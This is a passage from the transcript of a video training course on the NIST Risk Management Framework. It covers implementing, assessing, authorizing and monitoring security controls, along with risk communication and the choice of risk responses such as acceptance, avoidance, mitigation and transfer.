configuration. When implementing the security controls, there are a number of best practices that should be
followed. First, review the plan for implementing the control on the system. And address any assurance
requirements the organization may have for implementing controls. Assurance requirements are designed for
developers and implementers to test and prove the controls are implemented correctly.
Planning for security controls should be part of the development phase in the system development lifecycle.
Next, be sure to review publications and documentation on the correct implementation of the security control.
For example, NIST Special Publication 800-53 specifically addresses security and privacy controls, while NIST Special Publication 800-160 covers secure design engineering. The final best practice is to ensure that implementers are properly trained on the products and technologies they are implementing.
The implementation of the security controls involves many tasks, and may include writing and following organizational policies, plans, and operational procedures, and applying configuration settings to both the operating system and the applications on the system. The goal is to ensure the system is in a secure state, and that means focusing on all aspects of the system, not just the operating system. And then finally, you may want to install tools or software that help you automate the implementation of the control. This could be something as simple as a few scripts, or an enterprise application that helps automate the configuration. In this video,
you learned about implementing security controls.
Upon completion of this video, you will be able to describe the fourth step in the RMF, assessing security
control effectiveness.
Objectives
[Video description begins] Topic title: Assessing Security Controls. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about assessing security control effectiveness. After the implementation of the
security controls, it's imperative to move into the assess phase where you validate the implementation. When
validating the implementation of the security controls, you want to answer three questions. Are the controls implemented correctly? That is, based on industry best practices, has the control been configured correctly? Are the controls operating as intended? After verifying the configuration, you want to test the control.
For example, if the control is a firewall, you would validate that only the trusted packets are allowed to pass
through the firewall. The final question is: are the controls meeting the security requirements? This involves looking back at the requirements for the control and verifying it's doing what was required. NIST Special
Publication 800-53A is a supplemental document that discusses the steps to assess the implementation. First,
you want to develop the security assessment plan.
And in that plan determine which controls are to be assessed, determine the appropriate procedures to assess
those controls, and determine the depth and coverage needed for assurance. The next step to assessment is to
actually perform the assessment of the security controls based on the security assessment plan. Then, you want
to analyze the results of the assessment to determine if the goals of the security controls have been met.
And finally, create a security assessment report to communicate the results of the assessment. There are three
core assessment methods that work with different types of objects while assessing the implementation. First,
we have the interview method, which involves discussing the implementation with individuals or groups of
individuals. Then, we have the examine method which involves the assessors examining the specifications,
such as policies, procedures, and designs.
It also involves examining the functionality of hardware, software, and firmware on the systems, as well as examining activities such as system operations, administration, and management activities. Finally, we have the test method, which runs tests on mechanisms such as the functionality of
hardware, software, and firmware. This method also involves testing activities such as system operations,
administration, and management activities. In this video, you learned about assessing security control
effectiveness.
After completing this video, you will be able to describe the fifth step in the RMF, which is examining the
output of security controls assessment to determine whether or not the risk is acceptable.
Objectives
describe the fifth step in the RMF, examining output of security controls assessment to determine
whether or not the risk is acceptable
[Video description begins] Topic title: Examining Risk. Your host for the session is Glen E. Clarke. [Video
description ends]
In this video, you will learn about the fifth phase of the risk management framework which is authorize. The
authorize phase of the risk management framework involves examining the output of the security control's
assessment performed in the previous stage to determine whether or not the residual risk is acceptable to your
organization. Residual risk is the risk that remains after the implementation of the security controls. The output
in this case that is reviewed would be the security assessment report from the assess phase of the risk
management framework.
The person responsible for the authorization is known as the authorizing official who examines the output of
the security control assessment and determines whether or not the residual risk after the controls have been
implemented is acceptable. The authorizing official may consult with a number of other individuals within the
organization in order to make the authorization decision, such as the risk executive, the chief information officer for the organization, or the chief information security officer, to ensure that as a collective everyone agrees that the residual risk is acceptable. In this video, you learned about the
authorize phase of the risk management framework.
After completing this video, you will be able to describe the last step in the RMF, monitoring.
Objectives
[Video description begins] Topic title: Monitoring Controls. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about Step 6 of the risk management framework known as the monitor phase. In
the monitor phase, you're responsible for the continuous monitoring of controls that were implemented.
Continuous monitoring involves monitoring the operating environment for any changes to that environment, because any changes to the environment could affect the control's effectiveness.
Continuous monitoring also involves monitoring for activity that could be considered a sign of an attack, as you want to ensure that the control is effective in protecting the asset during the attack. There are different types of monitoring that should be incorporated into the organization-wide monitoring program. You should look
to implement risk monitoring and reassess if residual risk is acceptable.
You can use the guidance supplied in the NIST Special Publication 800-39. Monitor for configuration changes
and the management of those changes as changes to the environment could cause the control to be ineffective.
Look to guidance supplied in the NIST Special Publication 800-128.
And finally, always monitor the effectiveness of the control to ensure it is giving the protection that is needed.
NIST Special Publication document 800-137 gives recommendations for control effectiveness monitoring. In
this video, you learned about Step 6 of the risk management framework, the monitor phase.
Upon completion of this video, you will be able to recognize the benefits of a risk management approach that
focuses on control.
Objectives
[Video description begins] Topic title: Control Focused Risk Management. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about control-focused risk management. When performing a risk assessment, you typically follow these steps. First, you identify the assets within the organization. You then determine
the threats against each of those assets. Then you determine the impact that each threat would have against
those assets. And finally, you determine the likelihood of that threat occurring. For example, you may have a
business location that operates in an area that has the potential for earthquakes.
The threat of the earthquake would have high impact and cost the business hundreds of thousands of dollars, if
not millions. But you may not be overly concerned about this threat because the likelihood of it occurring is
almost nil. With a control-based risk assessment, you focus on identifying ways to control the risk and always come up with alternate risk controls as a company, so that you can evaluate the different risk controls and determine the best control to mitigate the risk. Many times, there may be multiple controls implemented in order to reduce risk. In this video, you learned about control-based risk assessment.
[Video description begins] Topic title: Event Focused Risk Management. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about the benefits of event-based risk management. There are a number of
different types of security events that can occur in environments today. There are system security events which
are security incidents that occur on a single system. There are service level security events associated with a
specific service, such as an email service or a database service.
And there are network-level security events, which are security events that occur on the network, such as a port scan across the network or the capturing of network traffic. When analyzing security events, you are looking to identify an occurrence of a possible security breach of the information security policy or one of the security controls involving a system, a service, or the network.
These security events can be events you can identify for certain as a security incident, or events that you are
uncertain of but must still investigate. With event-focused risk management, you focus on the critical events
and identify the risk associated with those critical events. In this video, you learned about event-focused risk
management.
Upon completion of this video, you will be able to list keys to presenting risk to stakeholders, such as soliciting stakeholder input.
Objectives
[Video description begins] Topic title: Risk Communication. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about presenting risk to stakeholders. Risk communication is an integral part of the
risk assessment process and typically includes communicating with company stakeholders and the parties that
own assets which are potentially at risk. It is important to note that risk communication is an iterative process
that involves communicating with stakeholders during each phase of the risk assessment.
The goal of risk communication is to ensure that the stakeholders have an understanding of the risk assessment
processes and assumptions being made while the risk assessment is being performed. It has been shown that early involvement and continuous communication with the stakeholders improve the quality of the risk assessment. Experience has shown that decisions made during a risk assessment in collaboration with the stakeholders are more durable and effective.
There are three key characteristics to stakeholder input that drives the success of the risk assessment. First,
getting input from the stakeholders should be an iterative process and happen at every phase of the risk
management process. Second, you want to get input from the stakeholders as early as possible in the risk
assessment process from the scoping phase to the implementation of recommendations to reducing risk.
Finally, getting input from the stakeholders during each phase of the risk assessment is going to improve the
quality of the assessment and the decisions made because of the assessment. One of the challenges with risk
assessments is risk perspective and perception. Stakeholders often have different perspectives on the findings
of the risk assessment and the appropriate mitigation actions that need to be taken.
The challenge is that these different perspectives create different perceptions of the magnitude of the risk and the priorities of the risk. For example, when dealing with hazardous materials, an odor may be perceived by some as not presenting any direct risk, but for others, failure to address the odor may raise concerns about the credibility of the cleanup process that occurred. One of the other challenges with risk communication is how to effectively present risk strategies.
When communicating risks to your audience, you must first find a way to present the facts to both a technical and a non-technical audience, and be sure to convey the following: the context, objective, and scope of the risk assessment, as well as the assumptions made, the methods used, and the endpoint for the risk assessment. In this video, you learned about risk communication.
Find out how to differentiate between different risk responses such as accepting, avoiding, mitigating, sharing,
or transferring risk.
Objectives
differentiate between different risk responses such as accepting, avoiding, mitigating, sharing, or
transferring risk
[Video description begins] Topic title: Risk Response and Remediation. Your host for the session is Glen E.
Clarke. [Video description ends]
In this video, you will learn how to respond to risk. When performing your risk assessment you will eventually
be deciding on how to respond to risk. This phase is divided into multiple sub-phases because you will need to
first identify the different courses of action you should use to respond to risk. Then you evaluate each of those
courses of action. Then you decide on the best course of action to take. And finally, you implement the course
of action.
You identify and evaluate multiple courses of action because you need to assess the impact each course of
action will have on the business missions and functions. When identifying and evaluating the different courses
of action, you want to understand the different types of information you use as input to make decisions. Factors that affect your decision include the identification of potential threats that could exist and the vulnerabilities associated with the asset.
You also want to consider the potential consequences, or impact of implementing a risk response measure. The
risk response measure is the action you take to respond to the risk being identified and evaluated. Finally, you
want to include as input any potential risk that may exist to the company or organization's assets, the operations and functions of the business or organization, the individuals within the organization, and any other organizations that may have relations with the organization being assessed.
When performing your risk assessment you are responsible for identifying the appropriate risk response to
each of the risks. There are a number of different types of potential responses. The first potential risk response
is risk acceptance. You would choose risk acceptance if the level of risk was within the organization's
tolerance to risk. For example, a company with a data center located in an area that has earthquakes may accept the risk due to the fact that the likelihood of an earthquake occurring is very low.
There is risk avoidance. Risk avoidance means that the company would no longer perform the activities that
are associated with the risk in order to avoid the risk. For example, a company that is planning to connect two
networks together may determine that the cost of implementing controls to reduce the risk associated with the
network connection is too high. So they avoid the risk by deciding not to connect the two networks together.
You have risk mitigation which is the most common action and involves implementing security controls to
reduce the level of risk to an organization's tolerance level. For example, implementing a firewall to protect the
e-commerce site will mitigate risk to the e-commerce site. And finally, you have risk sharing, which is also known as transferring risk. When transferring risk, you're shifting the risk liability and responsibility to
another organization. An example of transferring risk would be to get an insurance policy on a facility in case
it's damaged in a natural disaster.
After identifying the risk associated with each of the assets, and then identifying the different risk responses,
you'll need to evaluate the alternative courses of action to respond to risk. When evaluating the alternative
courses of action, you should determine how you will measure the effectiveness of the course of action, and
how feasible it is to implement the course of action. While evaluating the alternate courses of action, be sure to
determine the cost of the implementation throughout the life cycle of the solution, and not just the initial cost.
After evaluating the alternate courses of action the next step is to decide on the course of action you wish to
take. Deciding on the most appropriate course of action involves prioritizing responses. For example, some
risks are greater than others, so you may invest in mitigation of some risks while accepting or transferring
other risks. Sometimes, your risk response may require additional resources, as is the case with high-priority risk items over low-priority risk items. There is typically residual risk involved after taking risk action, so you'll need to address that residual risk and determine how to handle it. Other factors that affect the decision-making process are more intangible items, such as the risk tolerance, trust, and culture of the organization.
The final step is to implement the selected course of action which can be challenging depending on the size of
the organization and the complexity of the solution. The risk response measure that is taken may vary in time
to implement. For example, a risk response measure may be tactical, such as deploying patches to remove
identified vulnerabilities from a system. This is typically a quick implementation while other solutions are a bit
more strategic, such as the implementation of an alternate site in case of a natural disaster. In this video, you
learned how to respond to risk.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the security risk management framework and how it can be used to respond to organization-wide risk.
[Video description begins] Risk Management Framework is abbreviated as RMF. [Video description ends]
We did this by exploring how to assess, categorize, monitor, and respond to risk; how to select, implement, and assess security controls; how to examine risk acceptability and monitor controls; control-focused and event-focused risk management; and risk communication, response, and remediation. In our next course, we'll move on to explore software security with an emphasis on techniques used to perform software assessments and testing.